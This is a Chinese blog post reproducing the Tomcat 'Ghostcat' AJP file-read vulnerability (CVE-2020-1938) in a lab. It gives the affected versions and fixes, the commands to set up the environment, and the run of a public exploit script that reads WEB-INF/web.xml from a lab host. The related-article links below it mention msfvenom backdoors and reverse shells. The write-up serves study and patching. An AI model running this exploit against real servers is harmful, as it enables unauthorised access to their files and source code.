幽灵猫漏洞复现

最新推荐文章于 2024-05-11 11:31:04 发布
最新推荐文章于 2024-05-11 11:31:04 发布
阅读量714 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44664530/article/details/106121630
版权

漏洞编号:
CVE-2020-1938
CNVD-2020-10487
影响版本:
Apache Tomcat = 6
7 <= Apache Tomcat < 7.0.100
8 <= Apache Tomcat < 8.5.51
9 <= Apache Tomcat < 9.0.31
解决措施:
配置ajp配置中的secretRequired跟secret属性来限制认证 ;
临时禁用AJP协议端口,在conf/server.xml配置文件中注释掉<Connector port=“8009” protocol="AJP/1.3"redirectPort=“8443” /> ;
更新最新版 ;
漏洞环境搭建:

//漏洞apache下载
root@kali:~# wget http://192.168.31.149/CVE-2020-1938-master.zip
//解压
root@kali:~# unzip CVE-2020-1938-master.zip 
//进入目录
root@kali:~# cd CVE-2020-1938-master/
解压apache文件
root@kali:~/CVE-2020-1938-master# unzip apache-tomcat-8.5.32.zip 
//进入目录
root@kali:~/CVE-2020-1938-master# cd apache-tomcat-8.5.32/
//给予权限
root@kali:~/CVE-2020-1938-master/apache-tomcat-8.5.32# chmod -R 777 bin/
//运行
root@kali:~/CVE-2020-1938-master/apache-tomcat-8.5.32/bin# sh startup.sh

在这里插入图片描述
访问查看:
在这里插入图片描述
复现:

//靶机查看开放端口
root@kali:~/CVE-2020-1938-master/apache-tomcat-8.5.32/bin# netstat -anptul
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp6       0      0 :::8009                 :::*                    LISTEN      1389/java           
tcp6       0      0 :::8080                 :::*                    LISTEN      1389/java           
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      1389/java           
udp        0      0 0.0.0.0:68              0.0.0.0:*                           502/dhclient      

//攻击机下载exp
root@kali:~# git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
root@kali:~# cd CNVD-2020-10487-Tomcat-Ajp-lfi/
//读取WEB-INF/web.xml文件
root@kali:~/CNVD-2020-10487-Tomcat-Ajp-lfi# python CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f WEB-INF/web.xml 192.168.31.62
Getting resource at ajp13://192.168.31.62:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.

在这里插入图片描述
参考文献:
https://blog.csdn.net/weixin_43886632/article/details/104672219

曈曚
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tomcat-灵猫GhostCat漏洞
BROTHERYY的博客
03-20 3583
Tomcat-灵猫GhostCat漏洞 GhostCat漏洞大概是在2月份的时候暴露出来的,是由长亭发的,详细情况可以进入长亭的官网进行查看。 GhostCat 主要是存在文件读取和包含漏洞 我们具体看下影响了哪些版本 Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0...
Apache-Tomcat-Ajp灵猫漏洞(cve-2020-1938|CNVD-2020-10487)
Sylon的博客
03-18 2690
漏洞说明# Apache与Tomcat都是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。 Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。 漏洞危害# 由于Tomcat默认开启的AJP服务。端口号为8009,攻击者可构...
msfvenom介绍
最新发布
weixin_46483815的博客
05-11 1894
主要介绍msfvenom 和一些实验
CVE-2020-1938-GhostCat(灵猫漏洞
Bcdlbgm的博客
05-27 669
漏洞危害 可以读取/包含,webapps下的任意文件。 影响版本 9.0.0.M1 to 9.0.0.30 8.5.0 to 8.5.50 7.0.0 to 7.0.99 漏洞前提条件 版本参考上面一条 开启8009也就是AJP端口(默认开启) 环境 centos 7 tomcat 7.0.61 漏洞 POC 使用POC python2 .\CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.1.52 -f WEB-INF/web.xml 这是读取ROOT
CVE-2020-1938 Apache-Tomcat-Ajp (灵猫)文件包含漏洞
凝聚力安全团队
11-15 4535
目录漏洞描述影响版本漏洞环境搭建漏洞利用任意文件读取本地包含命令执行,测试ping dnslog反弹shell漏洞加固参考文章 漏洞描述   该漏洞使攻击者可以读取任何webapps文件(例如webapp配置文件,源代码等)或包括一个文件来远程执行代码。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 影响版本 Apache Tomcat 6 Apache Tomcat 7 &lt
Linux glibc 漏洞方案
02-06
"Linux glibc 漏洞方案" 一、漏洞概述 Linux glibc 漏洞是指 GNU 发布的 libc 库中的一种高危漏洞,编号为 CVE-2015-0235。该漏洞位于 glibc 的__nss_hostname_digits_dots() 函数中,存在缓冲区溢出...
Spectre灵、Meltdown熔断漏洞检测工具InSpectre Release 8
07-07
《Spectre灵与Meltdown熔断漏洞:InSpectre Release 8深度解析》 在代计算机安全领域,Spectre灵和Meltdown熔断漏洞是两个极具影响力的发,它们对全球范围内的处理器安全性构成了重大威胁。这两类漏洞源自...
cve-2015-0235 rhel4 漏洞
02-04
cve-2015-0235 rhel4x32 补丁包
关闭灵熔断关闭灵熔断
11-15
灵和熔断是两种著名的处理器安全漏洞,它们在2018年初被公开,对全球范围内的计算机系统构成了威胁。这些漏洞利用了代处理器的推测执行和微架构数据采样(MDS)特性,允许恶意软件在不同进程或虚拟机之间窃取...
Tomcat漏洞总结.rar
12-19
tomcat 漏洞总结 包括后台暴力破解 灵猫getshell war包getshell 任意文件上传
AJP及CSRF漏洞描述及处理方案
10-20
Apache JServ协议(AJP)是一种二进制协议,可以将来自Web服务器的入站请求代理到 位于Web服务器后面的应用程序服务器。不建议在互联网上公开使用AJP服务。 如果AJP配置错误,可能会允许攻击者访问内部资源。
灵猫 Tomcat文件读取 任意文件包含漏洞(CVE-2024-1938 CNVD-2024-10487)_cve-2024-1938修
04-12 1044
HTTP Connector很好理解,通过浏览器访问Tomcat服务器的Web应用时,使用的就是这个连接器;AJP Connector是通过AJP协议和一个Web容器进行交互。在将Tomcat与其他HTTP服务器(一般是Apache )集成时,就需要用到这个连接器。AJP协议是采用二进制形式代替文本形式传输,相比HTTP这种纯文本的协议来说,效率和性能更高,也做了很多优化。
SNI第三种模式/灵猫网络抓包方式/所有漏洞
weixin_57385269的博客
02-16 300
SNISNI产生背景SNI(Server Name Indication)定义在RFC 4366
Msfvenom介绍及利用
热门推荐
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
msfvenom常用参数
m0_61506558的博客
08-29 1540
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
网络攻防作业——Msfvenom的使用
yyy7654321的博客
06-28 2627
2. 利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)。1.利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听;3.把生成的windows下可执行的exe文件制到靶机。5.在靶机打开生成的abc.exe文件,开始监听。2. Msfvenom生成Payload。4.msfconsole开启监听。1.打开软件Msfvenom。6. 进行渗透测试操作。
msfvenom 基本使用
blackguest07的博客
03-05 1468
msfvenom 基础命令
AJP13漏洞利用
爱测未来团队博客
10-31 1万+
前言 平时学习过程中使用nmap扫描目标服务器或者C段的时候经常会发8009端口的AJP13服务,一直没有很在意这个服务是干嘛的。直到遇见一个服务器没有开放其他多余的端口情况下迫不得已要弄清楚,开放的这个服务是干什么的,MSF下的脚本又使用不方便功能单一,所以就有了这个文章。 AJP13服务简介 AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WE
漏洞Meltdwon熔断,Spectre
05-18
漏洞Meltdown和Spectre都是近年来被发的计算机安全漏洞。 Meltdown漏洞是由于代CPU在执行指令时使用了一种名为乱序执行(out-of-order execution)的技术,使得在执行指令前,会先进行一些操作,比如读取内存中的数据。如果在这个过程中发生了权限检查错误,攻击者就可以利用这个漏洞来读取到操作系统内核的敏感信息,比如密码等。 Spectre漏洞则是由于代CPU在执行指令时使用了分支预测(branch prediction)技术,使得在执行分支语句时,CPU会提前预测下一条指令,然后开始执行。如果预测错误,CPU会回滚到正确的分支上,但是这个过程中,会留下一些痕迹,而攻击者可以利用这些痕迹来获取私密信息。 这两种漏洞都是硬件层面的问题,几乎所有代CPU都受到影响。为了解决这些漏洞,需要对CPU进行微代码更新和操作系统补丁。同时,一些安全措施也需要被采取,比如禁止非特权进程访问内核空间。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值